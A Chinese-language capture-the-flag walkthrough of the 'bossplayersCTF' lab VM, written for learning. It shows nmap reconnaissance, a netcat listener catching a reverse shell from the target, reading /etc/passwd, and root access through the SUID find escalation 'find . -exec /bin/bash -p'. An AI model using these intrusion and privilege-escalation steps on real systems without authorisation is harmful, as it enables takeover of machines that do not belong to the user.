bossplayersCTF
常规扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sn 192.168.122.0/24
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 06:59 EST
Nmap scan report for 192.168.122.1
Host is up (0.00041s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.122.2
Host is up (0.00032s latency).
MAC Address: 00:50:56:FE:B5:1F (VMware)
Nmap scan report for 192.168.122.131
Host is up (0.00066s latency).
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap scan report for 192.168.122.254
Host is up (0.00022s latency).
MAC Address: 00:50:56:E8:B1:09 (VMware)
Nmap scan report for 192.168.122.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 4.03 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 06:59 EST
Nmap scan report for 192.168.122.131
Host is up (0.00068s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 4.92 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:00 EST
Nmap scan report for 192.168.122.131
Host is up (0.0010s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:00 EST
Nmap scan report for 192.168.122.131
Host is up (0.00053s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 17.54 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,80 192.168.122.131
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-06 07:01 EST
Nmap scan report for 192.168.122.131
Host is up (0.00052s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /logs.php: Logs
|_ /robots.txt: Robots file
MAC Address: 00:0C:29:5A:BF:54 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 31.26 seconds
两个文件?有点意思
^6f3386
先文件扫着
我看看这两个文件
兔子洞,下一个
泄露php页面
源码隐藏信息
WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK
查看页面
Test ping command - [ ]
命令执行
命令执行
[[工作/面试用的/RCE]]
获取shell
还真是,将环境转到kali中
提权
suid #find
[[SUID环境变量利⽤提权]]
[[sudo find]]
这里是利用find拥有suid权限
利用其调用bash获取一个root的会话
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
[sudo] kali 的密码:
listening on [any] 1234 ...
connect to [192.168.122.128] from (UNKNOWN) [192.168.122.131] 57022
python -c "import pty;pty.spawn('/bin/bash')"
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ export TERM=xterm-color
export TERM=xterm-color
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
cuong:x:1000:1000:cuong,,,:/home/cuong:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
www-data@bossplayers:/var/www/html$ cd /home
cd /home
www-data@bossplayers:/home$ la
la
bash: la: command not found
www-data@bossplayers:/home$ ls
ls
cuong
www-data@bossplayers:/home$ ls -liah
ls -liah
total 12K
205 drwxr-xr-x 3 root root 4.0K Sep 28 2019 .
2 drwxr-xr-x 18 root root 4.0K Sep 28 2019 ..
34 drwxr-xr-x 2 cuong cuong 4.0K Sep 28 2019 cuong
www-data@bossplayers:/home$ cd cuong
cd cuong
www-data@bossplayers:/home/cuong$ ls
ls
www-data@bossplayers:/home/cuong$ ls -liah
ls -liah
total 24K
34 drwxr-xr-x 2 cuong cuong 4.0K Sep 28 2019 .
205 drwxr-xr-x 3 root root 4.0K Sep 28 2019 ..
129 -rw------- 1 cuong cuong 5 Sep 28 2019 .bash_history
35 -rw-r--r-- 1 cuong cuong 220 Sep 28 2019 .bash_logout
36 -rw-r--r-- 1 cuong cuong 3.5K Sep 28 2019 .bashrc
45 -rw-r--r-- 1 cuong cuong 807 Sep 28 2019 .profile
www-data@bossplayers:/home/cuong$ cat .bash.history
cat .bash.history
cat: .bash.history: No such file or directory
www-data@bossplayers:/home/cuong$ sudo -l
sudo -l
bash: sudo: command not found
www-data@bossplayers:/home/cuong$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/mount
/usr/bin/umount
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/grep
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find
/usr/bin/newgrp
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
www-data@bossplayers:/home/cuong$ ^C
这里之前先完成一个完整的shell环境。
┌──(kali㉿kali)-[~]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.122.128] from (UNKNOWN) [192.168.122.131] 57024
python -c "import pty;pty.spawn('/bin/bash')"
www-data@bossplayers:/var/www/html$ ls
ls
index.html logs.php robots.txt workinginprogress.php
www-data@bossplayers:/var/www/html$ find . -exec /bin/bash -p \;
find . -exec /bin/bash -p \;
bash-5.0# whoami
whoami
root
bash-5.0# ls
ls
index.html logs.php robots.txt workinginprogress.php
bash-5.0# uname -a
uname -a
Linux bossplayers 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux
bash-5.0# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:5a:bf:54 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.131/24 brd 192.168.122.255 scope global dynamic ens33
valid_lft 1360sec preferred_lft 1360sec
inet6 fe80::20c:29ff:fe5a:bf54/64 scope link
valid_lft forever preferred_lft forever
bash-5.0# cd /root
cd /root
bash-5.0# ls
ls
root.txt
bash-5.0# cat root.txt
cat root.txt
Y29uZ3JhdHVsYXRpb25zCg==
bash-5.0# echo 29uZ3JhdHVsYXRpb25zCg==
echo 29uZ3JhdHVsYXRpb25zCg==
29uZ3JhdHVsYXRpb25zCg==
bash-5.0# echo 29uZ3JhdHVsYXRpb25zCg==
echo 29uZ3JhdHVsYXRpb25zCg==
29uZ3JhdHVsYXRpb25zCg==
bash-5.0#
搞定收工!
浙公网安备 33010602011771号